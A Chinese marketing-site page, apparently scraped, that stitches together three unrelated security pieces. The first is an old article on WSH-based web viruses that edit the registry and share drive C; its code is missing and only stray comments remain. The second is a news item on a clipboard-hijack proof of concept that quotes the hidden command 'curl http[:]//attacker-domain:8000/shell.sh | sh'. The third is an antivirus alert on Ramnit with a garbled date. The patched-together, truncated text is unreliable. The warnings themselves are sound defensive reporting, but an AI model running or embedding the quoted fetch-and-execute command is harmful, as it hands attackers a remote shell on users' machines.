整合營銷服務(wù)商
電腦端+手機端+微信端=數(shù)據(jù)同步管理
免費咨詢熱線:
電腦端+手機端+微信端=數(shù)據(jù)同步管理
免費咨詢熱線:
Windows Scripting Host Object Reference--罪魁禍?zhǔn)祝?
Windows Scripting Host Object Reference,以下簡稱Wsh.在windows 9x的默認(rèn)安裝時都有的,我發(fā)現(xiàn)絕大多數(shù)上網(wǎng)用戶都沒有卸載它。
我從來沒想到利用Wsh結(jié)合javascript能寫出如此厲害的網(wǎng)頁病毒來。先說說我寫這文章的來由:
我的一個朋友在訪問重慶吻網(wǎng)(www.cqkiss.com)后,他以后每次啟動機器在登陸對話框出現(xiàn)之前都會出現(xiàn)歡迎光臨重慶吻網(wǎng)(www.cqkiss.com)的字樣,由于平時對注冊表的東西留意得比較多,我知道肯定是在注冊表里改了什么設(shè)置。
由網(wǎng)頁可以直接操縱注冊表?我感到疑惑,但經(jīng)過我的研究發(fā)現(xiàn),事實上確實可以。通過我的研究發(fā)現(xiàn),Wsh的功能非常嚇人,我們可以寫出特定的頁面,你在訪問它之后可能出現(xiàn)如下后果:
1、刪除你硬盤上的指定文件,創(chuàng)建和修改文本文件,autoexec.bat是文本文件吧。我作了試驗,確實可以修改它。
2、執(zhí)行操作系統(tǒng)允許的任意程序;
3、把你的C盤設(shè)置為完全共享,然后別人可以在你的機器上安置木馬。我在所舉出的網(wǎng)頁例子中,就實現(xiàn)了設(shè)置C盤為隱含的完全共享的功能。由于你的網(wǎng)站只涉及到注冊表的操作,因此我在所舉出的例子中就只包含了這一部分。別的如1和2所述的功能實現(xiàn)就不給出。
MSDN上關(guān)于wsh對注冊表的操作說明:
The following table describes the methods associated with the WshShell object.
Method Description RegDelete --->Deletes a specified key or value from the registry.
RegRead --> Returns a specified key or value from the registry.
RegWrite --> Sets a specified key or value in the registry.
更詳細(xì)的說明請自己參照MSDN上的說明
在下面的網(wǎng)頁代碼例子中,我只嘗試了RegWrite和RegDelete兩種方法的使用。
網(wǎng)頁代碼的例子:
(注:/*...*/內(nèi)的文字是我的說明,在實際的網(wǎng)頁代碼中應(yīng)去掉。當(dāng)然它的功能實現(xiàn)需要wsh的支持)
/*index.htm文件內(nèi)容如下:*/
/*這一行好象必須要,意思不太明了*/
為你作了一件好事--你現(xiàn)在可以使用Regedit.exe了。
同時作了一件更大的壞事--把你的C盤完全共享了,請參照源代碼消除它好了。
如果你在上網(wǎng)前關(guān)掉了Windows script host,那么這個網(wǎng)頁代碼不會起作用。呵呵........
由此看來,上網(wǎng)真是一件很危險的事情?所以,我在上網(wǎng)前就先把那個Wsh給卸載掉了,就是在控制面板里選擇“添加/刪除程序”,再選擇"windows安裝程序"里的附件,再選擇“詳細(xì)資料”中的Windows Scripting Host,把它卸載掉就不用擔(dān)心它來害你了,不過你作的網(wǎng)頁上也不允許害別人喲。
你如果嫌麻煩就直接把c:\windows目錄底下的一個叫Wshom.ocx的文件改名好了,我就是把它改為Wshom.ocx.old的。
弈安傳媒科技微課堂,每天分享財經(jīng)資訊,計算機技術(shù)知識,人生感悟,創(chuàng)業(yè)指導(dǎo)以及各種專業(yè)技術(shù)知識資料學(xué)習(xí)交流.移動學(xué)習(xí)平臺、知識分享平臺。隨時隨地的學(xué)習(xí),如果你喜歡成長,這里你不容錯過的地方.弈安傳媒科技培訓(xùn)關(guān)注:關(guān)注自己成長,分享內(nèi)容,分享自己的技術(shù),成就未來.
[弈安傳媒科技提升自己的平臺]請關(guān)注:頭條號及公眾號 弈安傳媒科技
全研究人員警告,HTML頁面上的命令列可能藏匿惡意程序碼,開發(fā)者稍有不察直接復(fù)制貼上終端時,可能就讓黑客得以于程序中植入后門。
復(fù)制粘貼要當(dāng)心,病毒代碼在執(zhí)行
一名安全研究人員Gabriel Friedlander近日警告,隨手從網(wǎng)絡(luò)上復(fù)制與貼上(Copy/Paste)命令列時要特別小心,因為黑客可能趁此駭進開發(fā)者的系統(tǒng)或應(yīng)用程序。
Friedlander打造了一個概念性驗證攻擊手法,他設(shè)計一個假裝可用來更新Ubuntu作業(yè)系統(tǒng)的命令列,該命令列顯示的文字很簡單,為「sudo apt update」,但當(dāng)開發(fā)者復(fù)制它,并將它貼上記事本或終端時,它出現(xiàn)的卻是「curl http[:]//attacker-domain:8000/shell.sh | sh 」,若是直接貼入終端,它將立即執(zhí)行。
這是因為Friedlander在此一HTML頁面上藏匿了JavaScript程序碼,而讓開發(fā)者眼見的文字與貼上之后所呈現(xiàn)的內(nèi)容完全不同。
Friedlander說,不管是新手或是熟練的開發(fā)者,都可能會從網(wǎng)絡(luò)上復(fù)制命令列或部份程序碼,但這是非常危險的行為,也許會讓黑客直接于程序中植入后門,相關(guān)的攻擊非常地簡單,卻可能帶來極大的傷害,建議開發(fā)者應(yīng)永遠(yuǎn)避免于終端貼上直接自網(wǎng)絡(luò)上復(fù)制的命令列。
0月9日,火絨團隊發(fā)出安全警告,火絨工程師通過“火絨威脅情報系統(tǒng)”發(fā)現(xiàn),尚德機構(gòu)部分省份(91ld.com域名)的在職研究生培訓(xùn)報名服務(wù)中心頁面攜帶感染型病毒“Ramnit”。經(jīng)分析,該病毒或是通過“供應(yīng)鏈污染”的方式進行傳播,即網(wǎng)站開發(fā)者開發(fā)環(huán)境被病毒感染,導(dǎo)致制作的網(wǎng)頁攜帶病毒。但該病毒僅會感染未開啟瀏覽器安全選項且版本較低的操作系統(tǒng),因此普通用戶不必過于擔(dān)心。
如果病毒成功入侵電腦后,會感染電腦中的所有可執(zhí)行文件和HTML文件,竊取用戶上網(wǎng)信息(譬如瀏覽器cookies等),并且通過這些被感染文件進行重復(fù)傳播。建議近期登錄過上述相關(guān)網(wǎng)站的用戶,及時下載“火絨安全軟件”進行查殺。火絨產(chǎn)品無需升級,即可查殺該病毒。
目前,“供應(yīng)鏈污染”正在成為網(wǎng)絡(luò)平臺上病毒傳播的一大主要方式,火絨也曾多次發(fā)布過相關(guān)報道。火絨工程師建議尚德機構(gòu)盡快排查上述問題,避免出現(xiàn)病毒通過平臺進行傳播的可能性。另外,此次事件折射出的平臺數(shù)據(jù)安全監(jiān)管問題,應(yīng)當(dāng)引起廣大管理人員、開發(fā)人員的警惕 ,需要實時加強安全審查力度,必要時通過安裝合格的安全軟件進行自查,阻止病毒傳播。
*請認(rèn)真填寫需求信息,我們會在24小時內(nèi)與您取得聯(lián)系。
